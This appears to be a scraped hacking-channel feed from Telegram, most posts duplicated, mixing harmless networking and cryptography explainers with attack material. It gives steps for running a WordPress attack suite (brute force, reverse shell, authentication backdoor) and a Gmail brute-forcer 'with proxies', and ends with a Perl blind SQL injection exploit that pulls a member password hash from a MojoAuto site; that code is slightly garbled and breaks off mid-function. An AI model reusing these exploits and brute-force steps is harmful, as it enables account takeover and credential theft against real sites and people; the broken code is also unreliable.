β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is a random number generator?
1) The random number generator (RNG) is the modern equivalent of rolling dice or shuffling cards.
2) This form of randomization has now been mathematically transformed into a computer algorithm that works to generate a set of random numbers that (should) be free of any pattern.
3) When it comes to casino games, lotteries, sweepstakes and similar games, RNGs take the form of blocks of code hidden in software that provide a "chance" in gambling.
π¦Random RNG and Pseudo RNG
RNGs in casino games and slot machines are actually not random, but rather "pseudo".
1) The difference between the two is determined by the ways in which the numbers are generated.
2) In the case of a radial RNG, number generation is usually a completely unpredictable physical phenomenon (such as radio or atmospheric noise), fueled by entropy and explained only by quantum mechanics.
3) N Sevda RNG, on the other hand, using a mathematical algorithm or otherwise generated by a computer.
4) The key difference is that with the help of computer algorithms the entire result could be technically predicted if all the initial values ββwere known.
Hence ... "pseudo".
As in everything related to mathematics, if there is an equation, then it is not at all random.
π¦So, is it possible to hack an RNG?
Random number generators are quite complex.
As you can see, they include complex mathematical code that is hidden in software, encrypted, and hidden in computers monitored by CCTV cameras.
You must be a complete WRONG.. if you think you can hack the Random Number Generator.
In fact, you really only need a small piece of information to crack this code.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is a random number generator?
1) The random number generator (RNG) is the modern equivalent of rolling dice or shuffling cards.
2) This form of randomization has now been mathematically transformed into a computer algorithm that works to generate a set of random numbers that (should) be free of any pattern.
3) When it comes to casino games, lotteries, sweepstakes and similar games, RNGs take the form of blocks of code hidden in software that provide a "chance" in gambling.
π¦Random RNG and Pseudo RNG
RNGs in casino games and slot machines are actually not random, but rather "pseudo".
1) The difference between the two is determined by the ways in which the numbers are generated.
2) In the case of a radial RNG, number generation is usually a completely unpredictable physical phenomenon (such as radio or atmospheric noise), fueled by entropy and explained only by quantum mechanics.
3) N Sevda RNG, on the other hand, using a mathematical algorithm or otherwise generated by a computer.
4) The key difference is that with the help of computer algorithms the entire result could be technically predicted if all the initial values ββwere known.
Hence ... "pseudo".
As in everything related to mathematics, if there is an equation, then it is not at all random.
π¦So, is it possible to hack an RNG?
Random number generators are quite complex.
As you can see, they include complex mathematical code that is hidden in software, encrypted, and hidden in computers monitored by CCTV cameras.
You must be a complete WRONG.. if you think you can hack the Random Number Generator.
In fact, you really only need a small piece of information to crack this code.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Network/ip scanners & More :
https://istumbler.net
http://kismac-ng.org
https://www.kismetwireless.net
https://github.com/uoaerg/wavemon
https://github.com/ghostop14/sparrow-wifi
http://a.farproc.com/wifi-analyzer
https://apkpure.com/network-scanner/com.easymobile.lan.scanner
https://apkpure.com/net-scan/com.wwnd.netmapper
https://apkpure.com/network-scan/com.bitsworking.networkscanner.app
π¦ from wireshark:
https://www.youtube.com/watch?v=EUmHdVeBBNc
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Network/ip scanners & More :
https://istumbler.net
http://kismac-ng.org
https://www.kismetwireless.net
https://github.com/uoaerg/wavemon
https://github.com/ghostop14/sparrow-wifi
http://a.farproc.com/wifi-analyzer
https://apkpure.com/network-scanner/com.easymobile.lan.scanner
https://apkpure.com/net-scan/com.wwnd.netmapper
https://apkpure.com/network-scan/com.bitsworking.networkscanner.app
π¦ from wireshark:
https://www.youtube.com/watch?v=EUmHdVeBBNc
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
iStumbler Labs
Handcrafted Tools for Better Computing
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is CA/PEM/DER/X509/PKCS Encryption ?
> The general public key will not be transmitted to others in plain text
> . Under normal circumstances, a file will be generated.
> This file is the public key file. Then this file can be handed over to others for encryption, but if someone maliciously destroys it during the transmission process, it will be Your public key is replaced with his public key, and then the party who gets the public key encrypts the data.
> Can't he use his own key to decrypt and see the data? In order to solve this problem, a notary party is needed to do this Anyone can find it to confirm who sent the public key.
> This is the CA. The principle of the CA confirming the public key is also very simple. It publishes its own public key to everyone, and then one wants to publish its own public key.
> The key holder can send his public key and some identity information to the CA, and the CA encrypts it with its own key, which can also be called a signature here. Then this file containing your public key and your information can be called It is a certificate file. In this way, all people who have obtained some public key files decrypt the files through the public key of the CA.
> If they are decrypted normally, the information in the secret must be true, because the encryption party can only be the CA, and others There is no key. Then you can unlock the public key file and look at the information inside to know if this is the public key you need to encrypt.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is CA/PEM/DER/X509/PKCS Encryption ?
> The general public key will not be transmitted to others in plain text
> . Under normal circumstances, a file will be generated.
> This file is the public key file. Then this file can be handed over to others for encryption, but if someone maliciously destroys it during the transmission process, it will be Your public key is replaced with his public key, and then the party who gets the public key encrypts the data.
> Can't he use his own key to decrypt and see the data? In order to solve this problem, a notary party is needed to do this Anyone can find it to confirm who sent the public key.
> This is the CA. The principle of the CA confirming the public key is also very simple. It publishes its own public key to everyone, and then one wants to publish its own public key.
> The key holder can send his public key and some identity information to the CA, and the CA encrypts it with its own key, which can also be called a signature here. Then this file containing your public key and your information can be called It is a certificate file. In this way, all people who have obtained some public key files decrypt the files through the public key of the CA.
> If they are decrypted normally, the information in the secret must be true, because the encryption party can only be the CA, and others There is no key. Then you can unlock the public key file and look at the information inside to know if this is the public key you need to encrypt.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
UNDERCODE COMMUNITY
seccubus.png
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦πβοΈ Seccubus - Simple automated scanning, reporting and
vulnerability analysis :
Seccubus runs vulnerability scans at regular intervals and compares the findings of the last scan with the findings of the previous scan. The delta of this scan is presented in a web GUI where findings can be easily marked as either real findings or non-issues. Non issues get ignored until they change. This causes a dramatic reduction in analysis time. Before the results of a vulnerability scan are imported into Seccubus they are first converted to the Intermediate Vulnerability Information Language (IVIL) format to make sure Seccubus can work with many different scanners
F E A T U R E S :
Nessus
OpenVAS
Skipfish
Medusa (local and remote)
Nikto (local and remote)
NMap (local and remote)
OWASP-ZAP (local and remote)
SSLyze
Medusa
Qualys SSL labs
testssl.sh (local and remote)
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) wget https://github.com/schubergphilis/Seccubus_v2/releases/download/x/seccubus_x.Bx_all.deb
2) sudo apt-get update
3) sudo dpkg -i seccubus_2.32.143-0_amd64.deb # This will fail
4) sudo apt-get -f install # This will install failed dependancies
5) Update the configuration file in /etc/seccubus/config.xml
6) Reload the seccubus service if you changed the config.
service seccubus reload
7) After installation, the default username and password for seccubus is:
admin / GiveMeVulns!
8) It is highly recommended to change it after installation.
/bin/seccubus_passwd -u admin
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦πβοΈ Seccubus - Simple automated scanning, reporting and
vulnerability analysis :
Seccubus runs vulnerability scans at regular intervals and compares the findings of the last scan with the findings of the previous scan. The delta of this scan is presented in a web GUI where findings can be easily marked as either real findings or non-issues. Non issues get ignored until they change. This causes a dramatic reduction in analysis time. Before the results of a vulnerability scan are imported into Seccubus they are first converted to the Intermediate Vulnerability Information Language (IVIL) format to make sure Seccubus can work with many different scanners
F E A T U R E S :
Nessus
OpenVAS
Skipfish
Medusa (local and remote)
Nikto (local and remote)
NMap (local and remote)
OWASP-ZAP (local and remote)
SSLyze
Medusa
Qualys SSL labs
testssl.sh (local and remote)
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) wget https://github.com/schubergphilis/Seccubus_v2/releases/download/x/seccubus_x.Bx_all.deb
2) sudo apt-get update
3) sudo dpkg -i seccubus_2.32.143-0_amd64.deb # This will fail
4) sudo apt-get -f install # This will install failed dependancies
5) Update the configuration file in /etc/seccubus/config.xml
6) Reload the seccubus service if you changed the config.
service seccubus reload
7) After installation, the default username and password for seccubus is:
admin / GiveMeVulns!
8) It is highly recommended to change it after installation.
/bin/seccubus_passwd -u admin
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Another web hacking
#requested
F E A T U R E S :
Brute Force via API, not login form bypassing some forms of protection
Can automatically upload an interactive shell
Can be used to spawn a full featured reverse shell
Dumps WordPress password hashes
Can backdoor authentication function for plaintext password
collection
Inject BeEF hook into all pages
Pivot to meterpreter if needed
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) CLONE https://github.com/n00py/WPForce
2) cd WPForce
3) python wpforce.py -i usr.txt -w pass.txt -u "http://www.[website].com"
Full guide https://www.n00py.io/2017/03/squeezing-the-juice-out-of-a-compromised-wordpress-server/
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Another web hacking
#requested
F E A T U R E S :
Brute Force via API, not login form bypassing some forms of protection
Can automatically upload an interactive shell
Can be used to spawn a full featured reverse shell
Dumps WordPress password hashes
Can backdoor authentication function for plaintext password
collection
Inject BeEF hook into all pages
Pivot to meterpreter if needed
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) CLONE https://github.com/n00py/WPForce
2) cd WPForce
3) python wpforce.py -i usr.txt -w pass.txt -u "http://www.[website].com"
Full guide https://www.n00py.io/2017/03/squeezing-the-juice-out-of-a-compromised-wordpress-server/
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - n00py/WPForce: Wordpress Attack Suite
Wordpress Attack Suite. Contribute to n00py/WPForce development by creating an account on GitHub.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What are the hazards of vulnerabilities ?
The harm of SQL injection vulnerabilities is not only reflected in the database level, but also may endanger the operating system that hosts the database; if SQL injection is used to hang horses, it may also be used to spread malware, etc. These hazards include but are not limited to:
β’ Database information leakage: user privacy information stored in the database is leaked.
β’ Web page tampering: tampering with specific web pages by operating the database.
β’ The website is hacked to spread malicious software: modify the value of some fields in the database, embed the link of the network horse, and carry out a hacking attack.
β’ The database was maliciously operated: The database server was attacked and the database system administrator account was tampered with.
β’ The server is controlled remotely and a backdoor is installed: the operating system support provided by the database server allows hackers to modify or control the operating system.
β’ Destroy hard disk data and paralyze the entire system.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What are the hazards of vulnerabilities ?
The harm of SQL injection vulnerabilities is not only reflected in the database level, but also may endanger the operating system that hosts the database; if SQL injection is used to hang horses, it may also be used to spread malware, etc. These hazards include but are not limited to:
β’ Database information leakage: user privacy information stored in the database is leaked.
β’ Web page tampering: tampering with specific web pages by operating the database.
β’ The website is hacked to spread malicious software: modify the value of some fields in the database, embed the link of the network horse, and carry out a hacking attack.
β’ The database was maliciously operated: The database server was attacked and the database system administrator account was tampered with.
β’ The server is controlled remotely and a backdoor is installed: the operating system support provided by the database server allows hackers to modify or control the operating system.
β’ Destroy hard disk data and paralyze the entire system.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦CMD TOP COMMANDS :
#1 Ping
This command uses your internet connection in order to send some packets of data to a specific web address then these packets are sent back to your PC. The test simply shows the amount of time it took to reach the specific address. In simple words, it helps you to know if the host you pinging is alive.
You can use Ping command whenever you need to verify that the host computer can connect to the TCP/IP network and its resources.
For example, you can type in Command prompt ping 8.8.8.8 which belongs to Google.
You can replace β8.8.8.8β to βwww.google.comβ or something else which you want to ping.
#2 nslookup
It is a network administration command-line tool which helps you to obtain domain name or IP address mapping for any specific DNS record. Suppose you have a website URL but want to know its IP Address, you can simply type in CMD
nslookup www.google.com (Replace Google.com with your website URL of which you want to find the IP address)
#3 tracert
You can say Trace Route like its name it allows users to trace the route than an IP packed has taken to reach a destination. The command calculates and displays the amount of time each hop took to reach a destination. You just need to type
tracert x.x.x.x (if you know the IP Address) or else you can type tracert www.google.com (If you donβt know the IP address)
#4 arp
This command helps you to modify ARP cache. You can run arp-a command on each computer to see whether the computers have the correct MAC address listed for each other to ping each other succeed on the same subnet.
This command also helps users to find out if anyone has done arp poisoning in their LAN.
You can try typing arp-a in command prompt.
#5 ipconfig
This is the command which shows every useful thing. It will show you IPv6 address, temporary IPv6 address, IPv4 address, Subnet Mask, Default gateway and all other things that you want to know.
You can type in command prompt βipconfigβ or βipconfig/allβ
#6 netstat
If you want to find out who is establishing a connection with your computer then you might try typing in command prompt βnetstat -aβ it will display all the connection and you will get to know about the active connections and listening ports.
Type in command prompt βnetstat -aβ
#7 Route
It is a command which is used to view and manipulate the IP routing table in the Microsoft Windows operating system. This command will show you routing table, metric and interface.
You can type in command prompt βroute printβ
#8 Net View
This command displays the whole list of resources, computers or domains that are shared by the specified computer.
You can type in command prompt βnet view x.x.x.x or computernameβ
#9 Net User
Well, this command is used to modify changes to use accounts on a computer. You can add, remove users with the help of this command
You can use these commands while using net user
net user [<UserName> {<Password> | *} [<Options>]] [/domain] net user [<UserName> {<Password> | *} /add [<Options>] [/domain]] net user [<UserName> [/delete] [/domain]]
#10 Net Use
This command is been used to connect, remove and configure connections to shared resources like network printers and other mapped drives. The use of this command is a little bit complicated. So, we recommend you to visit the Microsoft site to get full details on how to use this command.
#11 Tasklist
This command opens up an entire task manager on the command prompt. Users just need to enter tasklist on CMD and they will see the list of all running process. You can figure out all the wrongs with this commands.
Moreover, the command can also be used when you need to forcefully close any process. For example, if you want to kill PID 1532 process then you can enter the command: taskkill /PID 1532 /F
Not only these, but you can even use iexplore <IP address> to find sites running on any particular IP address. The command is used in multiple ways by the hackers.
From wiki
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦CMD TOP COMMANDS :
#1 Ping
This command uses your internet connection in order to send some packets of data to a specific web address then these packets are sent back to your PC. The test simply shows the amount of time it took to reach the specific address. In simple words, it helps you to know if the host you pinging is alive.
You can use Ping command whenever you need to verify that the host computer can connect to the TCP/IP network and its resources.
For example, you can type in Command prompt ping 8.8.8.8 which belongs to Google.
You can replace β8.8.8.8β to βwww.google.comβ or something else which you want to ping.
#2 nslookup
It is a network administration command-line tool which helps you to obtain domain name or IP address mapping for any specific DNS record. Suppose you have a website URL but want to know its IP Address, you can simply type in CMD
nslookup www.google.com (Replace Google.com with your website URL of which you want to find the IP address)
#3 tracert
You can say Trace Route like its name it allows users to trace the route than an IP packed has taken to reach a destination. The command calculates and displays the amount of time each hop took to reach a destination. You just need to type
tracert x.x.x.x (if you know the IP Address) or else you can type tracert www.google.com (If you donβt know the IP address)
#4 arp
This command helps you to modify ARP cache. You can run arp-a command on each computer to see whether the computers have the correct MAC address listed for each other to ping each other succeed on the same subnet.
This command also helps users to find out if anyone has done arp poisoning in their LAN.
You can try typing arp-a in command prompt.
#5 ipconfig
This is the command which shows every useful thing. It will show you IPv6 address, temporary IPv6 address, IPv4 address, Subnet Mask, Default gateway and all other things that you want to know.
You can type in command prompt βipconfigβ or βipconfig/allβ
#6 netstat
If you want to find out who is establishing a connection with your computer then you might try typing in command prompt βnetstat -aβ it will display all the connection and you will get to know about the active connections and listening ports.
Type in command prompt βnetstat -aβ
#7 Route
It is a command which is used to view and manipulate the IP routing table in the Microsoft Windows operating system. This command will show you routing table, metric and interface.
You can type in command prompt βroute printβ
#8 Net View
This command displays the whole list of resources, computers or domains that are shared by the specified computer.
You can type in command prompt βnet view x.x.x.x or computernameβ
#9 Net User
Well, this command is used to modify changes to use accounts on a computer. You can add, remove users with the help of this command
You can use these commands while using net user
net user [<UserName> {<Password> | *} [<Options>]] [/domain] net user [<UserName> {<Password> | *} /add [<Options>] [/domain]] net user [<UserName> [/delete] [/domain]]
#10 Net Use
This command is been used to connect, remove and configure connections to shared resources like network printers and other mapped drives. The use of this command is a little bit complicated. So, we recommend you to visit the Microsoft site to get full details on how to use this command.
#11 Tasklist
This command opens up an entire task manager on the command prompt. Users just need to enter tasklist on CMD and they will see the list of all running process. You can figure out all the wrongs with this commands.
Moreover, the command can also be used when you need to forcefully close any process. For example, if you want to kill PID 1532 process then you can enter the command: taskkill /PID 1532 /F
Not only these, but you can even use iexplore <IP address> to find sites running on any particular IP address. The command is used in multiple ways by the hackers.
From wiki
β β β Uππ»βΊπ«Δπ¬πβ β β β
TODAY TOPIC :
hack passwords and more / Cipher
https://t.me/UnderCodeTesting/11758
Wordpress Exploit verified for 5.5.2 version
https://t.me/UnderCodeTesting/11759
#SocialMediaHacking Top Phishing tools
https://t.me/UnderCodeTesting/11762
How to show dropped packets for a network interface on Linux
https://t.me/UnderCodeTesting/11763
How viruses Spread
https://t.me/UnderCodeTesting/11764
Android reverse apk 2 tutorials/methodes
https://t.me/UnderCodeTesting/11765
https://t.me/UnderCodeTesting/11766
How to install dnscrypt proxy with ad blocker on Linux
https://t.me/UnderCodeTesting/11768
HACK PHONE ON SAME NETWORK - BY IP
https://t.me/UnderCodeTesting/11769
Network/ip scanners & More
https://www.kismetwireless.net
What is CA/PEM/DER/X509/PKCS Encryption ?
https://t.me/UnderCodeTesting/11772
Seccubus - Simple automated scanning, reporting and
vulnerability analysis
https://t.me/UnderCodeTesting/11774
Another web hacking
https://t.me/UnderCodeTesting/11775
What are the hazards of vulnerabilities ?
https://t.me/UnderCodeTesting/11776
New proxies detailed list
https://t.me/UnderCodeTesting/11777
CMD TOP COMMANDS
https://t.me/UnderCodeTesting/11778
ENJOY β€οΈππ»
USE FOR LEAN & HAVE A GOOD SUNDAY
β β β Uππ»βΊπ«Δπ¬πβ β β β
hack passwords and more / Cipher
https://t.me/UnderCodeTesting/11758
Wordpress Exploit verified for 5.5.2 version
https://t.me/UnderCodeTesting/11759
#SocialMediaHacking Top Phishing tools
https://t.me/UnderCodeTesting/11762
How to show dropped packets for a network interface on Linux
https://t.me/UnderCodeTesting/11763
How viruses Spread
https://t.me/UnderCodeTesting/11764
Android reverse apk 2 tutorials/methodes
https://t.me/UnderCodeTesting/11765
https://t.me/UnderCodeTesting/11766
How to install dnscrypt proxy with ad blocker on Linux
https://t.me/UnderCodeTesting/11768
HACK PHONE ON SAME NETWORK - BY IP
https://t.me/UnderCodeTesting/11769
Network/ip scanners & More
https://www.kismetwireless.net
What is CA/PEM/DER/X509/PKCS Encryption ?
https://t.me/UnderCodeTesting/11772
Seccubus - Simple automated scanning, reporting and
vulnerability analysis
https://t.me/UnderCodeTesting/11774
Another web hacking
https://t.me/UnderCodeTesting/11775
What are the hazards of vulnerabilities ?
https://t.me/UnderCodeTesting/11776
New proxies detailed list
https://t.me/UnderCodeTesting/11777
CMD TOP COMMANDS
https://t.me/UnderCodeTesting/11778
ENJOY β€οΈππ»
USE FOR LEAN & HAVE A GOOD SUNDAY
β β β Uππ»βΊπ«Δπ¬πβ β β β
Telegram
UNDERCODE TESTING
π¦WELCOME TO UNDERCODE TESTING
Undercode.help
UndercodeTesting.com
Follow:
Instagram.com/UndercodeTesting
Facebook.com/UndercodeTesting
twitter.com/UndercodeUpdate
Youtube.com/Undercode
MORE
UndercodeNews.com
DailyCve.com
iUndercode.com
BitLotoCoin.com
Undercode.help
UndercodeTesting.com
Follow:
Instagram.com/UndercodeTesting
Facebook.com/UndercodeTesting
twitter.com/UndercodeUpdate
Youtube.com/Undercode
MORE
UndercodeNews.com
DailyCve.com
iUndercode.com
BitLotoCoin.com
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π§ How to properly protect sysctl on Linux from spoofing and Syn-flooding ?
A) Protecting your Linux servers from SYN attacks and IP spoofing isn't as difficult as you might think.
Let's take a look at this with examples.
Sysctl allows you to make changes to a running Linux kernel.
This utility reads and modifies various kernel attributes such as version number, maximum limits, and a number of security parameters.
The sysctl system also helps prevent attacks such as SYN floods and IP spoofing.
B) This configuration will be as follows:
-Disable IP forwarding
-Disable packet forwarding
-Disable accepting ICMP redirects
-ENable protection against incorrect error messages
π¦What you need:
-Linux
-User with sudo privileges
π¦How to edit the sysctl config file
Log into your Linux server or desktop and open a terminal window.
In the terminal, enter the command:
sudo nano /etc/sysctl.conf
First required parameter:
# net.ipv4.ip_forward = 1
change to:
net.ipv4.ip_forward = 0
Next line:
# net.ipv4.conf.all.send_redirects = 0
change to:
net.ipv4.conf.all.send_redirects = 0
Find the line:
# net.ipv4.conf.all.accept_redirects = 0
change to:
net.ipv4.conf.all.accept_redirects = 0
Add the following line below that:
net.ipv4.conf.default.accept_redirects = 0
Finally, add the following lines to the end of the file:
net.ipv4.icmp_ignore_bogus_error_responses = 1
net.ipv4.tcp_syncookies = 1
net.ipv4.tcp_max_syn_backlog = 2048
net.ipv4.tcp_synack_retries = 3
net.ipv4.netfilter.ip_conntrack_tcp_timeout_syn_recv = 45
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π§ How to properly protect sysctl on Linux from spoofing and Syn-flooding ?
A) Protecting your Linux servers from SYN attacks and IP spoofing isn't as difficult as you might think.
Let's take a look at this with examples.
Sysctl allows you to make changes to a running Linux kernel.
This utility reads and modifies various kernel attributes such as version number, maximum limits, and a number of security parameters.
The sysctl system also helps prevent attacks such as SYN floods and IP spoofing.
B) This configuration will be as follows:
-Disable IP forwarding
-Disable packet forwarding
-Disable accepting ICMP redirects
-ENable protection against incorrect error messages
π¦What you need:
-Linux
-User with sudo privileges
π¦How to edit the sysctl config file
Log into your Linux server or desktop and open a terminal window.
In the terminal, enter the command:
sudo nano /etc/sysctl.conf
First required parameter:
# net.ipv4.ip_forward = 1
change to:
net.ipv4.ip_forward = 0
Next line:
# net.ipv4.conf.all.send_redirects = 0
change to:
net.ipv4.conf.all.send_redirects = 0
Find the line:
# net.ipv4.conf.all.accept_redirects = 0
change to:
net.ipv4.conf.all.accept_redirects = 0
Add the following line below that:
net.ipv4.conf.default.accept_redirects = 0
Finally, add the following lines to the end of the file:
net.ipv4.icmp_ignore_bogus_error_responses = 1
net.ipv4.tcp_syncookies = 1
net.ipv4.tcp_max_syn_backlog = 2048
net.ipv4.tcp_synack_retries = 3
net.ipv4.netfilter.ip_conntrack_tcp_timeout_syn_recv = 45
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
Course Fundamentals of Computer Hacking :
4.3 rating free #limited :
Everyone can become a hacker provided they learn it from the basics and build a solid foundation. Start with this course
https://www.udemy.com/course/computer-hacking-fundamentals/
4.3 rating free #limited :
Everyone can become a hacker provided they learn it from the basics and build a solid foundation. Start with this course
https://www.udemy.com/course/computer-hacking-fundamentals/
Udemy
Online Courses - Learn Anything, On Your Schedule | Udemy
Udemy is an online learning and teaching marketplace with over 250,000 courses and 80 million students. Learn programming, marketing, data science and more.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Kubernetes hacking and Security:
-
Kubernetes Pentest Methodology (part 1) by CyberArk
- Kubernetes Pentest Methodology (part 2) by CyberArk
- Kubernetes Pentest Methodology (part 2) by CyberArk
- Securing Kubernetes Clusters by Eliminating Risky Permissions
- Kubernetes Network Policies Recipes
- Kubiscan
- Kube-hunter
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Kubernetes hacking and Security:
-
Kubernetes Pentest Methodology (part 1) by CyberArk
- Kubernetes Pentest Methodology (part 2) by CyberArk
- Kubernetes Pentest Methodology (part 2) by CyberArk
- Securing Kubernetes Clusters by Eliminating Risky Permissions
- Kubernetes Network Policies Recipes
- Kubiscan
- Kube-hunter
β β β Uππ»βΊπ«Δπ¬πβ β β β
Cyberark
Kubernetes Pentest Methodology Part 1
As the pace of life accelerates, we spend less time waiting or in downtime. Kubernetes offers something similar for our life with technology. It is a container orchestration platform that offers...
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π§ How to manage Ethernet card using ethtool command :
A) How to install ethtool on Linux
By default ethtool should already be installed on most systems.
If not, you can install it from the official distribution repository.
1) For RHEL / CentOS 6/7 systems, use yum command to install ethtool.
$ sudo yum install -y ethtool
2) For RHEL / CentOS 8 and Fedora systems, use dnf command to install ethtool.
$ sudo yum install -y ethtool
3) For Debian based systems use apt or apt-get command to install ethtool.
$ sudo apt-get install ethtool
4) For openSUSE systems, use the zypper command to install ethtool.
$ sudo zypper install -y ethtool
5) For Arch Linux systems, use the pacman command to install ethtool.
$ sudo pacman -S ethtool
π¦How to check available network interfaces on Linux :
You can use the ip command or the ifconfig command (not recommended in modern distribution) to check the name and other details about the available and active network interfaces.
# ip a
or
# ifconfig
1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link / loopback 00: 00: 00: 00: 00: 00 brd 00: 00: 00: 00: 00: 00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
2: eth0: mtu 1500 qdisc mq state UP group default qlen 1000
link / ether 00: 10: 22: 35: 23: sf brd ff: ff: ff: ff: ff: ff
inet 192.164.23.100/24 brd 192.164.23.255 scope global eth0
valid_lft forever preferred_lft forever
π¦How to check network card (NIC) information on Linux
Once you get the name of the Ethernet interface, you can easily check it using the ethtool command as shown below.
In Linux, each network card (NIC) is assigned unique names such as ethX, enpXXX, etc.
Older Linux distributions used the eth [X] format. For example, RHEL 6 and older versions.
Modern Linux distributions use the enp [XXX] or ens [XXX] formats. For example, most modern Linux distributions use this format, including RHEL 7, Debian 10, Ubuntu 16.04 LTS.
# ethtool eth0
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π§ How to manage Ethernet card using ethtool command :
A) How to install ethtool on Linux
By default ethtool should already be installed on most systems.
If not, you can install it from the official distribution repository.
1) For RHEL / CentOS 6/7 systems, use yum command to install ethtool.
$ sudo yum install -y ethtool
2) For RHEL / CentOS 8 and Fedora systems, use dnf command to install ethtool.
$ sudo yum install -y ethtool
3) For Debian based systems use apt or apt-get command to install ethtool.
$ sudo apt-get install ethtool
4) For openSUSE systems, use the zypper command to install ethtool.
$ sudo zypper install -y ethtool
5) For Arch Linux systems, use the pacman command to install ethtool.
$ sudo pacman -S ethtool
π¦How to check available network interfaces on Linux :
You can use the ip command or the ifconfig command (not recommended in modern distribution) to check the name and other details about the available and active network interfaces.
# ip a
or
# ifconfig
1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link / loopback 00: 00: 00: 00: 00: 00 brd 00: 00: 00: 00: 00: 00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
2: eth0: mtu 1500 qdisc mq state UP group default qlen 1000
link / ether 00: 10: 22: 35: 23: sf brd ff: ff: ff: ff: ff: ff
inet 192.164.23.100/24 brd 192.164.23.255 scope global eth0
valid_lft forever preferred_lft forever
π¦How to check network card (NIC) information on Linux
Once you get the name of the Ethernet interface, you can easily check it using the ethtool command as shown below.
In Linux, each network card (NIC) is assigned unique names such as ethX, enpXXX, etc.
Older Linux distributions used the eth [X] format. For example, RHEL 6 and older versions.
Modern Linux distributions use the enp [XXX] or ens [XXX] formats. For example, most modern Linux distributions use this format, including RHEL 7, Debian 10, Ubuntu 16.04 LTS.
# ethtool eth0
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
38995760-7b25ec4c-439e-11e8-9430-c33bd9b1f5b4.png
115.3 KB
π¦Gmail bruteforce:
1) git clone https://github.com/Ha3MrX/Gemail-Hack
2) cd Gemail-Hack
3) chmod +x gemailhack.py
4) python gemailhack.py
#fastTips
1) git clone https://github.com/Ha3MrX/Gemail-Hack
2) cd Gemail-Hack
3) chmod +x gemailhack.py
4) python gemailhack.py
#fastTips
UNDERCODE COMMUNITY
38995760-7b25ec4c-439e-11e8-9430-c33bd9b1f5b4.png
don't forget to use proxies /
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit :
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " #################### Viva IslaMe Viva IslaMe ################\n";
print " # MojoAuto Blind SQL Injection Exploit #\n";
print " # (mojoAuto.cgi mojo ) #\n";
print " # Author: Mr.SQL #\n";
print " # EMAIL : SQL@HOTMAIL.IT #\n";
print " # #\n";
print " # -((:: GrE3E3E3E3E3ETZ ::))- #\n";
print " # #\n";
print " # HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab #\n";
print " # :: ALwHeD :: milw0rm :: #\n";
print " # #\n";
print " # <<>> MuSliMs HaCkErS <<>> #\n";
print " # #\n";
print " # HOME: WwW.PaL-HaCkEr.CoM #\n";
print " # #\n";
print " # Usage : perl test.pl host #\n";
print " # Example: perl test.pl www.host.com / -d 10 #\n";
print " # Options: #\n";
print " # -d valid cat_a value #\n";
print " #############################################################\n";
exit;
}
my $host = $ARGV[0];
my $cat_a = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "p=s", "d=i");
print "[~] Exploiting...\n";
if($options{"b"})
{
$mojo = $options{"b"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i )
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $cat_a, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h ;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $cat_a, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h ;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $cat_a = shift;
my $i = shift;
my $h = shift; my $ua = LWP::UserAgent->new;
my $query = "http://".$host."mojoAuto.cgi?mojo=1&action=browse&cat_a=".$cat_a." and (SUBSTRING((SELECT password FROM member LIMIT 0,1),".$i.",1))=CHAR(".$h.")"; if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
} my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "tourterms.pdf"; if($content =~ /$regexp/)
{
return 1;
}
